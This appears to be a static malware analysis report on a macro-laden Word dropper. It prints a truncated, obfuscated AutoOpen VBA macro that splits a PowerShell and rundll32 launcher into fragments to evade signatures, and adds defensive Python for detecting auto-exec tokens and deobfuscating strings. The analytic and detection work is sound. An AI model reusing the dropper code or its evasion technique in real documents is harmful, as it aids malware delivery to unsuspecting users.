Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ddf1a7ee3a36d640…

MALICIOUS

Office (OLE)

Size: 344.0 KB
Created: 2018-10-11 10:27:00
Authoring application: Microsoft Office Word
First seen: 2020-05-25
MD5: 2e6eac5c9600d230382003f9a6ecd616
SHA-1: dcfd83dd6189853eb3e710baedfca8d8751e9f38
SHA-256: ddf1a7ee3a36d6409f7f81a2e5fc68e5741d8a8b4f4ea9634e62a75db8fed0b1
Risk score: 230

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a Word document carrying a VBA project. An AutoOpen procedure, a CreateObject call and the p-code auto-execution heuristic together indicate that the macro runs as soon as the document is opened, with no user interaction beyond enabling macros. The recovered source (macros.bas, previewed below) is padded with meaningless arithmetic assignments and dozens of helper functions that do nothing; the only real work is in AutoOpen, which reads Environ("SystemRoot") and assembles a command line from short string literals. The fragments use PowerShell-style "$name='...';" syntax, and one of them ends in "rundll3" while a later one starts with "2';", so the launcher string is split specifically to defeat signatures that look for whole keywords. The ClamAV detection Doc.Dropper.Agent is consistent with this: the document is a stager that drops or launches a second-stage payload. No malware family could be attributed from static analysis, and the preview is truncated before the assembled command is executed, so the exact payload and its delivery method are not recoverable from this report alone.

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-7148212-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-7148212-0
  • VBA macros detected [medium] 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    The VBA project contains an AutoOpen procedure, which Word runs as soon as the document is opened with macros enabled
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    The macro calls CreateObject, the usual way VBA instantiates COM objects such as a shell or HTTP client; the call itself is not in the truncated preview below
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) [low] OLE_VBA_ENVIRON
    The macro reads environment variables through Environ(); in the recovered source it reads SystemRoot to start building a path
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
    Caveat for this sample: a VBA project was in fact recovered (see Extracted artifacts), so this marker most likely reflects the same AutoOpen procedure seen by the legacy-format scan rather than an independent WordBasic macro. Treat it as corroborating OLE_VBA_AUTOOPEN, not as a separate finding.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#  In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/  In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/  In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#  In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/  In document text (OLE body)
    • http://purl.org/dc/elements/1.1/  In document text (OLE body)
    • http://ns.adobe.com/tiff/1.0/  In document text (OLE body)
    • http://ns.adobe.com/exif/1.0/  In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main  In document text (OLE body)
    All nine are XML namespace identifiers (RDF, Adobe XMP/Photoshop/TIFF/EXIF image metadata, Dublin Core, DrawingML) carried in embedded picture metadata and the document's drawing parts. They are schema names, not addresses the macro contacts, and none of them appears in the recovered macro source; do not promote them to network indicators.
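The OLE_VBA_PCODE_AUTOEXEC_EXEC rule is worth reproducing in your own triage tooling, because source extraction can fail on damaged or deliberately mangled projects while the compiled p-code is what Office actually executes when the VBA version matches. The following Python is an added example, not the scanner's code, showing the token-pair logic on raw stream bytes in both single-byte and UTF-16LE encodings; the stream blobs are constructed for the example, not taken from the sample, and real use would pull the module, dir or cache streams out of the OLE container (for instance with olefile) and pass each one to classify_stream().

```python
"""Added example (not part of the report or of the scanner that produced
it): an approximation of the OLE_VBA_PCODE_AUTOEXEC_EXEC rule.  It scans
the raw bytes of a stream for auto-execution identifiers together with
shell/download/object-execution identifiers, in both single-byte and
UTF-16LE encodings, so a hit survives even when the decompressed VBA
source is unavailable."""

AUTOEXEC_TOKENS = ("AutoOpen", "AutoExec", "AutoClose", "Auto_Open",
                   "Document_Open", "Workbook_Open")
# Execution tokens grouped by channel; any one channel together with an
# auto-exec token is enough to flag the stream.
EXEC_TOKENS = {
    "shell": ("Shell", "WScript.Shell", "ShellExecute"),
    "download": ("URLDownloadToFile", "XMLHTTP", "WinHttpRequest", "DownloadFile"),
    "object": ("CreateObject", "GetObject"),
}


def _encodings(token: str) -> tuple:
    # Identifier tables in compiled VBA carry names both as MBCS text and as
    # UTF-16LE, so search for both forms.
    return token.encode("ascii"), token.encode("utf-16-le")


def find_tokens(data: bytes, tokens) -> list:
    """Case-insensitive search for each token in either encoding."""
    # bytes.lower() folds ASCII letters only, which also covers the
    # "x\x00" byte pattern of UTF-16LE-encoded ASCII identifiers.
    haystack = data.lower()
    hits = []
    for tok in tokens:
        if any(enc.lower() in haystack for enc in _encodings(tok)):
            hits.append(tok)
    return hits


def classify_stream(data: bytes) -> dict:
    """Return the auto-exec and execution tokens found in one stream and
    whether the combination crosses the rule's threshold."""
    autoexec = find_tokens(data, AUTOEXEC_TOKENS)
    execution = {chan: found for chan, toks in EXEC_TOKENS.items()
                 if (found := find_tokens(data, toks))}
    return {"autoexec": autoexec, "exec": execution,
            "flag": bool(autoexec) and bool(execution)}


# Constructed stand-in for a compiled module stream: identifiers separated by
# opaque length/record bytes, one of them stored as UTF-16LE.  Not taken
# from the sample.
SAMPLE_STREAM = (b"\x00\x0bAutoOpen\x01\x00\x2aThisDocument\x00\x00"
                 + "CreateObject".encode("utf-16-le") + b"\xff\x00Environ\x00")
# Same layout, but the only thing after the auto-exec token is a message box.
BENIGN_STREAM = b"\x00\x0bAutoOpen\x00MsgBox\x00"

if __name__ == "__main__":
    for name, blob in (("sample", SAMPLE_STREAM), ("benign", BENIGN_STREAM)):
        print(name, classify_stream(blob))
```

The rule deliberately requires both halves: an auto-exec name alone is common in benign templates, and CreateObject alone appears in plenty of legitimate automation. A stream that carries both, with no readable source to explain them, deserves the same severity the report assigns here.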

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 236248 bytes
SHA-256: 3b73e1cd1d39d05e4aab3b8010900808e8f9f8caa3890a107d27bdb90713ac22
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Function tiwka(jpuyeujz, alzih)
fdoyag6 = -47 + 48
widgxeoe = -113 + 159
egwaaoywx62 = -13 - 80
oguuvyp = -9 - 67
End Function
Function cwoocpz(irrela)
ovpedq = -178 - 126
uuymny1 = -15 * 15
Dim ywftcsy As Integer
ywftcsy = -106 - 177
End Function
Function iptmqicbg7(lbzddfma, tkboa0, uepjco)
qobhouhs30 = -180 * 51
steplau = -159 / 143
End Function
Function oauxbfy()
eeauo8 = -72 / 87
airimt83 = -138 * 150
kvnzm = -50 - 20
kqebjfvmii = -157 / 155
End Function
Function ayvktpx(holaeo, ckmvctpvx)
uoead = -130 - 8
yyaqnlyiu = -21 * 134
ictayarged = -30 - 104
Dim xsfpno, btwbmvaktup, ylddxsyvd As Integer
xsfpno = -25 + 144
End Function
Function beye(swjylnee)
haizitzyzz9 = -164 - 92
oucyb8 = -47 + 21
qxbnugzaiw9 = -165 - 16
End Function
Function oepura()
yzjjbibxdmyi = -115 * 94
End Function
Function thdjogbbb(ggnndg, stnwave)
yfsxyzr8 = -70 * 22
iiuo5 = -41 + 65
uyeqjuxd = -163 - 91
End Function
Function aoxfz(zlngtxs44, eepi, eief0)
uezhmloip = -156 * 163
End Function
Function xrixpjnml9()
sdujmu = -16 - 140
Dim lvpdtqnglo As String
lvpdtqnglo = -108 * 117
vteuycn = -34 / 20
End Function
Function hyagbfg()
nbdwnvoqkcztc61 = -110 + 62
nviavgb = -123 * 2
ayueghalp = -115 * 78
End Function
Function kbdmu()
prutxeiarwmb = -96 - 143
tcsgftff = -173 + 166
ivzpuoao = -31 * 133
End Function
Function xgacn(wlwllxi, ewvyjlz)
euaemwwygb = -120 - 123
itagzk00 = -54 / 6
Dim lgyei As String
lgyei = -90 - 86
oqmftuhfkvbk9 = -95 / 106
End Function
Function gshvcsqmp69(miaea, cspxu, rhufiis)
erljvmmo3 = -66 / 59
mwuidpaogo = -18 + 105
End Function
Function ehaoi()
xjpjvuial41 = -156 - 125
plddyvxjtwa = -47 - 23
Dim ozswpnkfnvpz As Integer
ozswpnkfnvpz = -62 + 6
qejyoyoe = -134 + 28
End Function
Function vuihb()
uupi = -169 * 165
End Function
Function dgyngfbd97(eaynqxro)
eietzvsi = -33 - 113
End Function
Function gdmhuer(tkwppeim, ybphtproj, zkoxmdrqwt)
aoakvmgdviu = -124 + 98
bneb6 = -61 / 101
End Function
Function fjilvmui()
uyut = -29 / 128
awkqc = -178 * 136
vwkckqkta = -15 - 113
End Function
Function ujnrbujz(onaqo)
fdcleetm = -57 * 56
End Function
Sub AutoOpen()
fteuhgu = -84 - 116
ksrtieydntu = -164 - 35
tbgauju = "$axjmzbuhvbryt"
axwau = -33 / 40
ieeov = -111 - 179
tsbbuoey = -165 / 133
ajhljeea = "xsyegd"
roaciybw = -106 * 111
owtyulo9 = "qaomqjvg='ct ';$xgmxcuuxw"
aiuzu90 = -16 / 39
ytmkhuhz = "te"
Dim tooasmzqb, yctbpidnmj80, itpqjeymhbwo70, wbtcirwou As String
tooasmzqb = -34 - 97
yibbiyya = -109 + 121
yoepjjrs = -5 * 99
ruyagr = "mp"
ayea = -74 + 1
nbxjsy = ytmkhuhz & ruyagr
Dim ejralx4 As Integer
ejralx4 = -48 * 91
Dim itsauy As Integer
itsauy = -33 / 147
qmauvk = -94 / 30
pkdxtzq = -57 * 107
Dim oowltr As String
oowltr = -73 + 104
szyoi = "lsiabdrkrcy='et"
ejfquyk = -173 * 32
iykcu = -18 / 43
jmqvuwye = -165 + 85
zedvhzzwn = ".Web';$"
ujzal = "bjvvzrbwnax"
okaegiisg = -161 / 127
ktyuph = "mltirlkmlj=' ($env';$auzfoi"
yeaiuspyo = -141 + 167
Dim insa As String
insa = -95 - 175
eioigg = Environ("SystemRoot")
Dim jelxigz As Integer
jelxigz = -162 + 134
yyuajfeq = -141 + 94
jrdvfsbjiq = -97 - 152
hwscvx = -53 / 58
Dim kghnkedljf As Integer
kghnkedljf = -92 + 37
fzaaesf = "ftbjojrok='"
uuuo22 = -107 + 38
kvnbctgaqbgxi = -8 - 5
xziauo = -147 - 32
zujtxq = " rundll3"
ytwursx = -85 * 34
yvhuaa = -144 - 109
aooaou = -143 * 97
gjky = tbgauju & ajhljeea & owtyulo9 & szyoi & zedvhzzwn & ujzal & ktyuph & fzaaesf & zujtxq
uydgeywri0 = -149 * 129
Dim yyejv29 As Integer
yyejv29 = -163 / 143
nsibwra = -102 * 27
atlouo = -141 * 13
eiofxey43 = -96 + 141
bxsbr = "2';$ffirvlsoi"
nbitrukjzhzb = eioigg
hfjnqlxrxgvvjh = -4 / 23
nbitrukjzhzb = nbitrukjzhzb + "\sys"
bidbl = -33 /
... (truncated)
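The filler-heavy AutoOpen above reads much more easily once the arithmetic assignments are thrown away and the string joins are followed. The tracer below is an added example, written for this page and not taken from the report, the sample or oletools. Its input is the string-bearing lines of the preview, copied with most of the filler removed (the copy is constructed for the example and stops where the preview stops); it models Environ("X") as %X% and resolves only literals, known names and the & / + operators, so every junk assignment falls out on its own.

```python
"""Added example, not part of the report: a string-only tracer for the
junk-padded VBA style seen in macros.bas.  It keeps assignments whose
right-hand side is built from string literals, previously resolved names,
Environ("X") calls and the & / + concatenation operators, discards
everything else (arithmetic filler, unknown names, other calls), and
models Environ("X") as %X% so the assembled fragments become readable
without running the document."""
import re

# Constructed input: the string-bearing lines of AutoOpen as shown in the
# preview, plus a little filler left in so the tracer has something to drop.
SAMPLE_VBA = r'''
Function tiwka(jpuyeujz, alzih)
fdoyag6 = -47 + 48
End Function
Sub AutoOpen()
fteuhgu = -84 - 116
tbgauju = "$axjmzbuhvbryt"
axwau = -33 / 40
ajhljeea = "xsyegd"
owtyulo9 = "qaomqjvg='ct ';$xgmxcuuxw"
ytmkhuhz = "te"
Dim tooasmzqb, yctbpidnmj80, itpqjeymhbwo70, wbtcirwou As String
ruyagr = "mp"
nbxjsy = ytmkhuhz & ruyagr
szyoi = "lsiabdrkrcy='et"
zedvhzzwn = ".Web';$"
ujzal = "bjvvzrbwnax"
ktyuph = "mltirlkmlj=' ($env';$auzfoi"
eioigg = Environ("SystemRoot")
fzaaesf = "ftbjojrok='"
zujtxq = " rundll3"
gjky = tbgauju & ajhljeea & owtyulo9 & szyoi & zedvhzzwn & ujzal & ktyuph & fzaaesf & zujtxq
bxsbr = "2';$ffirvlsoi"
nbitrukjzhzb = eioigg
nbitrukjzhzb = nbitrukjzhzb + "\sys"
End Sub
'''

ASSIGN_RE = re.compile(r'^\s*(?:Set\s+)?([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')
TOKEN_RE = re.compile(
    r'"((?:[^"]|"")*)"'                    # string literal ("" escapes a quote)
    r'|Environ\s*\(\s*"([^"]+)"\s*\)'      # Environ("NAME"), modelled as %NAME%
    r'|([A-Za-z_]\w*)'                     # identifier (must already be resolved)
    r'|([&+])'                             # concatenation operator
    r'|(\S)',                              # anything else: numbers, - * /, parens
    re.I)


def eval_expr(expr: str, env: dict):
    """Resolve a pure string expression; return None for anything that is
    not one (that is exactly the filler we want to ignore)."""
    out, expect_operand = [], True
    for m in TOKEN_RE.finditer(expr):
        lit, envname, ident, op, other = m.groups()
        if other is not None:
            return None
        if op is not None:
            if expect_operand:
                return None
            expect_operand = True
            continue
        if not expect_operand:
            return None
        if lit is not None:
            out.append(lit.replace('""', '"'))
        elif envname is not None:
            out.append("%" + envname + "%")
        elif ident.lower() in env:
            out.append(env[ident.lower()])
        else:
            return None
        expect_operand = False
    return None if expect_operand or not out else "".join(out)


def trace_strings(source: str) -> dict:
    """Walk the module top to bottom and keep every string-valued
    assignment; VBA names are case-insensitive, so keys are lower-cased."""
    env = {}
    for line in source.splitlines():
        m = ASSIGN_RE.match(line)
        if m:
            val = eval_expr(m.group(2), env)
            if val is not None:
                env[m.group(1).lower()] = val
    return env


def longest(env: dict, n: int = 3) -> list:
    """The n longest resolved values: assembled command fragments float up."""
    return sorted(env.items(), key=lambda kv: len(kv[1]), reverse=True)[:n]


if __name__ == "__main__":
    for name, value in longest(trace_strings(SAMPLE_VBA)):
        print(f"{name} = {value!r}")
```

Running it shows the value of gjky beginning "$axjmzbuhvbrytxsyegdqaomqjvg='ct ';" and ending "ftbjojrok=' rundll3", with "%SystemRoot%\sys" and "temp" resolved alongside it. The tracer does not model line continuations, Chr()/StrReverse() decoding or array joins; when a sample uses those, extend eval_expr rather than reaching for a sandbox first, since the goal is to read the command without executing the document.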